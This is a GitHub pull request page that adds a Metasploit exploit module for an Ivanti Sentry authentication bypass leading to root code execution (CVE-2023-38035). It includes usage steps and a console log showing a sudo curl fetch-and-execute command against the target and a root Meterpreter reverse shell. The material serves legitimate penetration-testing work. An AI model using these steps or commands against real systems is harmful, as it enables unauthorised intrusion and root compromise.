Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035) #18330

Merged
merged 10 commits into from
Sep 13, 2023
Merged

Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035) #18330

merged 10 commits into from
Sep 13, 2023

Conversation

jheysel-r7
Copy link
Contributor

@jheysel-r7 jheysel-r7 commented Aug 29, 2023
edited by cgranleese-r7

Ivanti Sentry (formerly Mobileiron Sentry) is vulnerable to an authentication by-pass which exposes API functionality which
allows for code execution in the context of the root user. The vulnerable endpoint /mics/services/MICSLogService exposes a binary web service protocol 'Hessian' which allows remote users to invoke functions within the target. One of the functions accessible via Hessian and the vulnerable endpoint is uploadFileUsingFileInput which accepts a command argument that gets directly fed into a Runtime.getRuntime().exec(cmd) call. The command is run in the context of the tomcat user however by default tomcat is in the sudoers file and thus we can use this to execute the payload in the context of the root user.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Do: use exploit/linux/http/ivanti_sentry_misc_log_service
  • Do: set RHOST [IP]
  • Do: set FETCH_SRVHOST [IP]
  • Do: set LHOST [IP]
  • Do: exploit

Testing on MobileIron Sentry 9.12.0-16 (Unix In Memory)

msf6 > use linux/http/ivanti_sentry_misc_log_service
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set rhosts 192.168.1.78
rhosts => 192.168.1.78
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set lhost 192.168.1.72
lhost => 192.168.1.72
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set fetch_srvhost 192.168.1.72
fetch_srvhost => 192.168.1.72
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set verbose true
verbose => true
msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > options

Module options (exploit/linux/http/ivanti_sentry_misc_log_service):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   SLEEP  3                yes       How long to wait for each command to run. Because the execu
                                             tion context does not allow for command piping or chaining
                                             we need to split the multi command payload by semi-colon an
                                             d send each command individually
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...
                                             ]
   RHOSTS         192.168.1.78     yes       The target host(s), see https://docs.metasploit.com/docs/us
                                             ing-metasploit/basics/using-metasploit.html
   RPORT          8443             yes       The target port (TCP)
   SSL            true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                         no        Path to a custom SSL certificate (default is randomly gener
                                             ated)
   URIPATH                         no        The URI to use for this exploit (default is random)
   USE_SUDO       true             yes       Execute payload as root using sudo
   VHOST                           no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                        address on the local machine or 0.0.0.0 to listen on all address
                                       es.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, T
                                                  NFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      QldLjjMRU        no        Name to use on remote system when storing payload; can
                                                  not contain spaces.
   FETCH_SRVHOST       192.168.1.72     no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain s
                                                  paces.
   LHOST               192.168.1.72     yes       The listen address (an interface may be specified)
   LPORT               4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > rexploit
[*] Reloading module...

[*] Command to run on remote host: curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg; chmod +x /tmp/ccrjHXsc; /tmp/ccrjHXsc &
[*] Fetch Handler listening on 192.168.1.72:8080
[*] HTTP server started
[*] Adding resource /etRbFA76UzDRclkL8zrTdg
[*] Started reverse TCP handler on 192.168.1.72:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix (In-Memory) for cmd/linux/http/x64/meterpreter_reverse_tcp
[*] Running the command: sudo curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg
[*] Client 192.168.1.78 requested /etRbFA76UzDRclkL8zrTdg
[*] Sending payload to 192.168.1.78 (curl/7.29.0)
[*] Running the command: sudo  chmod +x /tmp/ccrjHXsc
[*] Running the command: sudo  /tmp/ccrjHXsc &
[*] Meterpreter session 6 opened (192.168.1.72:4443 -> 192.168.1.78:40550) at 2023-08-29 14:27:57 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.8.2003 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit

@jheysel-r7 @wvu
Update modules/exploits/linux/http/ivanti_sentry_misc_log_service.rb
68090d0 
Co-authored-by: wvu <4551878+wvu@users.noreply.github.com>
@cgranleese-r7 cgranleese-r7 self-assigned this Sep 5, 2023
@jheysel-r7 jheysel-r7 linked an issue Sep 6, 2023 that may be closed by this pull request
Create module for Ivanti Sentry (CVE-2023-38035) #18320
Closed
@cgranleese-r7 cgranleese-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 7, 2023
@jheysel-r7 @cgranleese-r7
Apply suggestions from code review
7944df2 
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
@cgranleese-r7
Copy link
Contributor

Everything seems to be working as expected 👍

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.8.2003 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@cgranleese-r7 cgranleese-r7 merged commit e82bff3 into rapid7:master Sep 13, 2023
34 checks passed
@cgranleese-r7
Copy link
Contributor

Release Notes

This PR adds an exploit module that targets Ivanti Sentry (formerly Mobileiron Sentry) which is vulnerable to an authentication by-pass which exposes API functionality which allows for code execution in the context of the root user.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@wvu wvu wvu left review comments

@smcintyre-r7 smcintyre-r7 smcintyre-r7 left review comments

@cgranleese-r7 cgranleese-r7 cgranleese-r7 left review comments

@jvoisin jvoisin jvoisin approved these changes

Assignees

@cgranleese-r7 cgranleese-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Create module for Ivanti Sentry (CVE-2023-38035)
5 participants
@jheysel-r7 @cgranleese-r7 @jvoisin @wvu @smcintyre-r7